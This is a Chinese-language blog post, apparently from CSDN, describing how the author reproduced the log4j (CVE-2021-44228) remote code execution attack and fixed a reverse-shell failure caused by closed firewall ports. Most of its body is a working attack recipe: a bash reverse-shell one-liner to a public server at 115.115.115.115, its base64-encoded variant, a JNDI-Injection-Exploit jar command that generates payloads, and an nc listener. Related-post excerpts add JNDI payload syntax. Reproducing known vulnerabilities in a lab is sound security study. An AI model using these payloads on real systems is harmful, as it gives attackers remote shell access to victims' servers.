log4j复现及难点解决

最新推荐文章于 2024-05-30 11:22:55 发布
最新推荐文章于 2024-05-30 11:22:55 发布
阅读量5k 收藏
点赞数
分类专栏: 渗透 文章标签: 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42253265/article/details/123969151
版权

卡了我好多天的难题终于解决了铁子们,太激动了。之前做这个实验用的是别人的服务器,没遇到过这个问题。这次自己买了个服务器,没想到却发生了反弹失败的情况。

log4j反弹地址一定要公网服务器,所以我买了一台公网服务器。

但是公网服务器的端口策略是没有开放的,导致监听端口没办法得到回应,最后失败。

请教大屌之后,才解决了这个难题,大屌yyds。接下来记录一下我的实验过程。

环境

一个log4j漏洞的网站

一台公网服务器(端口策略开放)
接下来的实验将以 115.115.115.115 代替这台倒霉服务器

实验步骤

需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload

工具地址:
https://github.com/bkfish/Apache-Log4j-Learning/tree/main/tools

使用如下网址来加密反弹shell命令

加密网址:
https://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell方法:
https://www.freebuf.com/articles/system/178150.html

bash -i >& /dev/tcp/115.115.115.115/9999 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTUuMTE1LjExNS4xMTUvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
图片.png

vps打开工具路径,输入命令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “要执行的命令” -A “你自己的公网服务器地址”

举例:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTUuMTE1LjExNS4xMTUvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}” -A “115.115.115.115”

图片.png
nc监听服务器地址

nc -lnvp 9999

图片.png

将给出的红色payload打入目标站点

图片.png
反弹shell成功
图片.png

冰羽呐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j漏洞复现(CVE-2021-44228)
qq_32445755的博客
01-13 534
Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3761
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
Log4J 漏洞复现
qq_42307546的博客
12-13 2854
介绍:log4j是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布 log4j存在远程代码执行漏洞,通过lookup来触发漏洞详情参考 https://zhuanlan.zhihu.com/p/444140910 首先我们需要编写一个恶意的类然后编译成class文件 public class Exploit { public Exploit(){ try{ // 要执行的命令 String[] comma
log4j代码审计漏洞复现
最新发布
Python_paipai的博客
05-30 763
首先声明一下,这是一套老源码了,本人只是跟着网上的步骤复现了一遍,主要目的还是面向毫无基础的xd,教学简单的java站怎么自己搭建,不至于代码审计的第一步就废了,本人也是摸着石头过河的,大佬勿喷。file.getOriginalFilename()将会获取表单中name="file"的值,实际情况中"file"是什么值就会获取什么值,往上定位,发现该接口为管理员头像上传接口。注意originalFileName,该变量可控 ,往上看,该变量的值为。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。
Log4j复现过程
weixin_50339832的博客
12-26 2385
log4j是一个记录日志的组件,用来对程序状态进行动态记录, logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi, 并打印,jndi就是这个从外部查找得到的java对象。 schema:获取方式,jdk支持多种不同的查找方式,包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单,被作为常用的获取方式
Log4j漏洞复现
m1287578441的博客
06-08 2948
Log4j漏洞复现
log4j漏洞复现
weixin_68647219的博客
04-20 4627
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
log4j日志报错解决办法
09-06
解决这个问题的第一步是在Maven项目中引入Log4j的依赖。在`pom.xml`文件中添加以下代码段: ```xml <groupId>log4j <artifactId>log4j <version>1.2.17 ``` 这将确保你的项目能够找到并使用Log4j库。 接下来...
Log4j2漏洞复现
热门推荐
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
CVE-2021-22448(log4j2) 漏洞复现
Ethan_cfq的博客
04-12 360
作者严正声明!!! 作者严正声明!!! 作者严正声明!!! 【********************************************************************************** 以下环境是docker搭建的靶场学习环境,禁止在互联网中操作,若在互联网中操作导致的后果与作者无关, ************************************************************************************] 部署log
火爆全网的Log4j 漏洞复现GetShell
柠檬i的博客
12-26 8035
Apache Log4j2 JNDI注入漏洞(CVE-2021-44228),可以任意命令执行
Apache Log4j2漏洞复现
MoCoCN的博客
12-22 2922
0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01漏洞描述 Apache Log4j2是一款优秀的
Apache Log4j2远程代码执行漏洞复现
weixin_42345596的博客
12-10 8229
漏洞原理 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 影响版本 Log4j2.x<=2.14.1 漏洞复现 漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ 准备环境 把受影响的jar包拖进随手创建的一个java项目,这里部署jar包步骤就不写了,网上一搜傻瓜式教程都有。 攻击机环境搭建,这里我用的vps(师兄的,因为我的是Windows。)jdk版本最好&
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值